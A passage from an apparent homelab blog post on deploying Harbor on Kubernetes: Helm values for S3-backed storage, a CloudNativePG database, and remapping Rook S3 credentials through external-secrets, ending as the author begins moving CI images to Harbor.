</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">external</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;harbor-pg-cluster-rw&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">coreDatabase</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">harbor-pg-cluster-app</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">redis</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">external</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">addr</span>: <span style="color:#ae81ff">redis.redis.svc.cluster.local:6379</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metrics</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>The above is only for completeness&rsquo; sake. Let&rsquo;s go through the config bit-by-bit.
The first part is the setup for external access:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">expose</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ingress</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tls</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">certSource</span>: <span style="color:#ae81ff">none</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">core</span>: <span style="color:#ae81ff">harbor.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">myentrypoint</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">harbor</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">externalURL</span>: <span style="color:#ae81ff">https://harbor.example.com</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ipFamily</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ipv6</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>This uses my <a href="https://blog.mei-home.net/posts/k8s-migration-3-traefik-ingress/">Traefik Ingress</a>
to provide external connectivity. I&rsquo;m disabling IPv6 because I don&rsquo;t have it
set up in my Homelab. Please note the (perfectly normal!) spelling of <code>externalURL</code>.
I initially spelled it differently, so the chart fell back to its default, and all the pull
commands which Harbor helpfully shows in the web UI had the default URL in them. One of those
things which can really only be solved by staring very intently at the YAML for an extended
period of time. &#x1f605;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageChartStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">disableredirect</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">s3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">my-harbor-rgw-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">bucket</span>: <span style="color:#ae81ff">harbor-random-numbers-here</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regionendpoint</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-myobjectstorename.my-rook-cluster-namespace.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">v4auth</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">rootdirectory</span>: <span style="color:#ae81ff">/harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">encrypt</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secure</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Next up is persistence. Harbor has two approaches here. The first one, which is
the default and which I&rsquo;m not using, stores the data, like container images, on
PersistentVolumeClaims. The second one is S3, which is what I&rsquo;m using here.
I also disable the registry&rsquo;s redirect feature. It would normally redirect
download requests directly to the S3 storage, but access to my S3 storage is very limited
outside the cluster, and with my relatively low levels of activity, I don&rsquo;t need
to reduce the load on Harbor&rsquo;s registry by enabling it.
I&rsquo;m using my <a href="https://blog.mei-home.net/posts/k8s-migration-4-ceph-rook/">Ceph Rook based S3 setup</a>
here. Again for completeness&rsquo; sake, here is the manifest for creating the bucket:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">objectbucket.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ObjectBucketClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">generateBucketName</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span></code></pre></div><p>I will talk about the secrets setup later in a separate section.</p>
<p>Another important thing to configure when running without persistent volumes is where
the job logs go, e.g. the logs from the automated security scans Harbor can conduct on the
images:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">jobservice</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jobLoggers</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">database</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256Mi</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">podLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span></code></pre></div><p>The important part here is the <code>jobservice.jobLoggers[0]=database</code> setting,
which configures the job service to write logs to the Postgres DB.</p>
<p>I&rsquo;m also disabling all of this security scanning, by switching off <code>trivy.enabled</code>.</p>
<p>Next somewhat interesting thing is the database setup:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">external</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">external</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;harbor-pg-cluster-rw&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">coreDatabase</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#ae81ff">harbor-pg-cluster-app</span>
</span></span></code></pre></div><p>To manage the database, I&rsquo;m using <a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">my CloudNativePG setup</a>.
Here are some parts of the database config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">200M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">150m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;200&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;50MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;150MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;12800kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;1536kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;128kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_keep_size</span>: <span style="color:#e6db74">&#34;512MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1.</span><span style="color:#ae81ff">5G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span></code></pre></div><p>I hope this is a good compromise between dumping a long piece of YAML into
every post about an app which needs Postgres, and not showing the database
setup at all.</p>
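<p>For context, those parameters live inside a CloudNativePG Cluster resource. A minimal,
hedged skeleton of what that roughly looks like (the instance count is illustrative, and the
resources, parameters and storage from the snippet above slot into the marked spot):</p>
<pre tabindex="0"><code>apiVersion: postgresql.cnpg.io/v1
kind: Cluster
metadata:
  name: harbor-pg-cluster
  labels:
    homelab/part-of: harbor
spec:
  instances: 2   # illustrative, not necessarily my actual count
  bootstrap:
    initdb:
      database: harbor
      owner: harbor
  # resources, postgresql.parameters and storage go here, as shown above
</code></pre><p>CNPG then creates the <code>harbor-pg-cluster-rw</code> Service and the
<code>harbor-pg-cluster-app</code> Secret that the Helm values above refer to.</p>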
<p>Finally, I&rsquo;m using my Redis instance for caching and disabling metrics
explicitly, so when I get around to gathering all the app level metrics and
making dashboards, I&rsquo;ve got something to grep for in the Homelab repo. &#x1f609;</p>
<h3 id="issues-with-secrets">Issues with secrets</h3>
<p>I had a couple of issues with the different secrets which Harbor needs.
First, let&rsquo;s start with the place where it&rsquo;s doing it right, the admin
credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPassword</span>: <span style="color:#ae81ff">my-admin-secret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">existingSecretAdminPasswordKey</span>: <span style="color:#ae81ff">mySecretsKey</span>
</span></span></code></pre></div><p>The Helm chart doesn&rsquo;t just allow setting the Secret to use, but also which key
in that Secret contains the password. That&rsquo;s how it should be done.</p>
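<p>For completeness, the referenced Secret can be as simple as the following sketch; the
name and key just have to match the two values above, and the password is obviously a
placeholder:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Secret
metadata:
  name: my-admin-secret
  labels:
    homelab/part-of: harbor
stringData:
  mySecretsKey: not-my-real-admin-password   # placeholder
</code></pre>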
<p>The credentials for the database were also okay, because the key the Helm chart
expects, <code>password</code>, happens to also be the key under which CloudNativePG stores
the user password in the Secret it creates with the credentials. What saddened
me a bit is that I couldn&rsquo;t source the host and port from that Secret as well,
even though CNPG puts those into it too.</p>
<p>But a lot more annoying were the S3 credentials. For every bucket, Rook creates a
Secret with the access key and the secret key, plus a ConfigMap with the semi-randomly
generated bucket name and the correct endpoint. It would have been nice if I could have
handed those objects over to the Helm chart directly. Instead, I hardcoded the values in
the <code>values.yaml</code>, which means some manual intervention if I ever have to
recreate it all.
For the credentials, I could at least provide the name of an existing Secret.
But as per the <code>values.yaml</code> comments, the access key and the secret key need
to be put into specific keys in the provided Secret. And those were not the
standard key names you would expect, e.g. <code>AccessKey</code> and <code>SecretKey</code>.
No, they have to be <code>REGISTRY_STORAGE_S3_ACCESSKEY</code> and <code>REGISTRY_STORAGE_S3_SECRETKEY</code>.</p>
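<p>To make the mismatch concrete, here is roughly what Rook generates for the
ObjectBucketClaim above, going by its docs; the values are placeholders, the key names are
the point:</p>
<pre tabindex="0"><code># Secret created by Rook for the ObjectBucketClaim
apiVersion: v1
kind: Secret
metadata:
  name: harbor
data:
  AWS_ACCESS_KEY_ID: base64-placeholder
  AWS_SECRET_ACCESS_KEY: base64-placeholder
---
# ConfigMap created alongside it
apiVersion: v1
kind: ConfigMap
metadata:
  name: harbor
data:
  BUCKET_NAME: harbor-random-numbers-here
  BUCKET_HOST: rook-ceph-rgw-myobjectstorename.my-rook-cluster-namespace.svc
</code></pre><p>So the credentials exist, just not under the key names the Harbor chart wants.</p>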
<p>So what to do now? Manually extract the keys from Rook&rsquo;s secret and write a new
secret by hand? Luckily, no. The Fediverse came through, and somebody proposed
to use external-secrets&rsquo; <a href="https://external-secrets.io/latest/provider/kubernetes/">Kubernetes provider</a>.
This provider allows me to automatically take a Kubernetes Secret, and create
a new secret from it, with the same data in different keys. This is still a pretty
roundabout way, but I decided that this is preferable to the other options,
which would be writing a secret by hand or forking the Helm chart.</p>
<p>First, we need to define some RBAC objects for use by the SecretStore for the
Kubernetes provider.</p>
<p>Here is the ServiceAccount:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span></code></pre></div><p>Next, we need a Role for that ServiceAccount to use:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">secrets</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">selfsubjectrulesreviews</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span></code></pre></div><p>This allows all accounts using the Role to view Secrets in the Namespace the
Role is created in, which in this case is my Harbor Namespace.</p>
<p>Finally, we need a RoleBinding to bind the Role to the ServiceAccount:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">RoleBinding</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">roleRef</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apiGroup</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">subjects</span>:
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ServiceAccount</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span></code></pre></div><p>Once all of that has been created, we can define the SecretStore:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-secrets-store</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">provider</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteNamespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">serviceAccount</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ext-secrets-harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">caProvider</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-root-ca.crt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span></code></pre></div><p>One fascinating thing I learned is that Kubernetes puts the CA certs for the
kube-apiserver in every Namespace, under a ConfigMap called <code>kube-root-ca.crt</code>.</p>
<p>This SecretStore can then be used to take the Secret created by Rook for the
S3 bucket and rewrite it to fit the expectations of the Harbor chart as follows:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;harbor-s3-secret&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-secrets-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">SecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">REGISTRY_STORAGE_S3_ACCESSKEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">AWS_ACCESS_KEY_ID</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">REGISTRY_STORAGE_S3_SECRETKEY</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">AWS_SECRET_ACCESS_KEY</span>
</span></span></code></pre></div><p>This will have external-secrets go to the kube-apiserver and get the
<code>AWS_SECRET_ACCESS_KEY</code> and <code>AWS_ACCESS_KEY_ID</code> keys from the <code>harbor</code> Secret,
which was previously created automatically by Rook through the <a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">ObjectBucketClaim</a>
I used to create the S3 bucket for Harbor.</p>
<p>And with these five simple manifests, I could use the Rook S3 Secret with the
Harbor Helm chart. &#x1f605;</p>
<p>One last thing that tripped me up during setup was the registry credentials.
The <a href="https://github.com/goharbor/harbor-helm/blob/main/values.yaml">values.yaml</a>
contains these comments on how to set up the credentials:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">registry</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">credentials</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#e6db74">&#34;harbor_registry_user&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;harbor_registry_password&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># If using existingSecret, the key must be REGISTRY_PASSWD and REGISTRY_HTPASSWD</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># Login and password in htpasswd string format. Excludes `registry.credentials.username`  and `registry.credentials.password`. May come in handy when integrating with tools like argocd or flux. This allows the same line to be generated each time the template is rendered, instead of the `htpasswd` function from helm, which generates different lines each time because of the salt.</span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e"># htpasswdString: $apr1$XLefHzeG$Xl4.s00sMSCCcMyJljSZb0 # example string</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">htpasswdString</span>: <span style="color:#e6db74">&#34;&#34;</span>
</span></span></code></pre></div><p>What I did not initially get from that comment was that when using an existing
Secret, both the clear text password and the htpasswd string are required.
That put me into an amusing conundrum: I did not have a single host
with <code>htpasswd</code> available. &#x1f602;
I ended up using the Apache container just to generate the htpasswd string:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>docker run -it httpd htpasswd -n -B my-harbor-registry-user
</span></span></code></pre></div><p>I then put that string into the Secret verbatim and was finally able to start
the Harbor instance.</p>
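<p>Putting that together, the registry credentials Secret looks roughly like this sketch;
both values are placeholders, with the htpasswd line being the verbatim output of the
command above:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Secret
metadata:
  name: my-harbor-registry-user-secret
  labels:
    homelab/part-of: harbor
stringData:
  REGISTRY_PASSWD: the-clear-text-registry-password   # placeholder
  REGISTRY_HTPASSWD: my-harbor-registry-user:$2y$05$placeholder-bcrypt-hash
</code></pre>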
<h2 id="transferring-my-internal-images-to-harbor">Transferring my internal images to Harbor</h2>
<p>The first step I took was to transfer all of my internal images over to Harbor,
by adapting the CI jobs which create them and pointing them to Harbor.</p>
<p>I&rsquo;ve currently got five internal images, most of them just copies of official
images with some additions. I create them with <a href="https://www.drone.io/">Drone CI</a>,
which I will switch over to <a href="https://woodpecker-ci.org/">Woodpecker</a> later as
part of the migration.</p>
<p>The first step in transferring the images was to set up a user for the CI in
Harbor. This can be done with the Harbor Terraform provider, but I did it
manually for now. Then I created a &ldquo;homelab&rdquo; project for those Docker images.</p>
<p>For my image repository, which houses the Dockerfiles for most of my internal
images, I have a <code>.drone.jsonnet</code> file which looks like this:</p>
<pre tabindex="0"><code>local alpine_ver = &#34;3.19.1&#34;;

